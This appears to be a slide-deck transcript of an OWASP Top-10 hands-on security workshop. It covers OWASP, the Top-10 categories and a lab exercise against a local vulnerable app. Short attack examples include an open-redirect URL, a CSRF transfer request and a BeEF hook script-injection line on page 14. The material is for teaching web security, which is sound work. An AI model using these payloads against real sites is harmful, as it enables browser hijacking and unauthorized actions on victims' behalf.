«OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

18
OWASP Top-10 Hands-on Workshop

Transcript of «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Page 1: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

OWASP Top-10 Hands-on Workshop

Page 2: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

•Security Engineer @ SoftServe•NU “LP” student

whoami

Page 3: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

•Web Application Security Assessment•Penetration Testing•Secure Software Development Lifecycle

What we do?

Page 4: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

•Non-profit organization•Numerous chapters around the globe•Everyone can join•Open-Source

Open Web ApplicationSecurity Project

Page 5: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Meetings and conferences all around the globe

@AppSecEU ‘15 in Amsterdam

Page 6: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Knowledge base

Page 7: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

OWASP Top-10

InjectionBroken Auth and

Session Management

XSSInsecure Direct

Object References

Security misconfiguration

Sensitive Data Exposure

Missing Function Level

ControlCSRF

Using Known Vulnerable

Components

Unvalidated Redirects and

Forwards

Page 8: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

OWASP is GOOD!Hackers• Methodologies how to hack

Developers• Methodologies how to implement things securely and fix them

Testers• The same that hackers do• Methodologies how to test security stuff on their projects

Page 9: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Demo Time

Page 10: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

•Either go by scenario with me or try to find 10 vulnerabilities by yourself.•No scanners (DDoS alert).•Do not attack infrastructure. Only web application vulnerabilities here.•Do not attack people around you.•No punching.

Rules

Page 11: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

•172.16.216.28:5000/login?redirect_url=google.com•172.16.216.28:5000/change_password=1234•Credentials:

Let’s begin

[email protected]/[email protected]/admin

Page 12: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Open Redirect

example.com/smth?redirect_url=http://google.com

CSRF

bank.com/trans?acc1=1234&acc2=4321&ammount=10000

Open Redirect + CSRF

Page 13: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Cross-Site Scripting

Supply JS code instead of valid data which will be processed by the browser

Broken Auth

Session management flaws

(HTTPOnly flag is missing in

our case)

XSS + Broken Authentication

Page 14: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Inject this script into the website<script src=“<url to the hook>” type=“text/javascript”/>

BeEF

Page 15: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

SQL-injection

Supply SQL operators and statements instead of valid data which will be processed with the server as SQL queries (not strings)

Security misconfiguration

Crypto misuse, wrong DB

configuration, etc

Sensitive Data Exposure

Critical info leakage

SQLi + Security Misconfiguration + Sensitive Data Exposure

Page 16: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Insecure Direct Object

Reference

Access file you have no

permission to

Missing Function Level Control

Access to restricted

(sensitive) function.

Using Components with known Vulnerabilities

Vulnerable OS, libraries, frameworks, CMS,

Algorithms, etc.

Everything else …

Page 17: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

• Try it by yourselfhttps://github.com/Varyagovich/hole-blog• Try to fix the project• Use OWASP projects (attack/prevention

cheat sheets and tools)• Contribute!

What to do next?

Page 18: «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

http://owasp-lviv.blogspot.com/

STAY SAFE!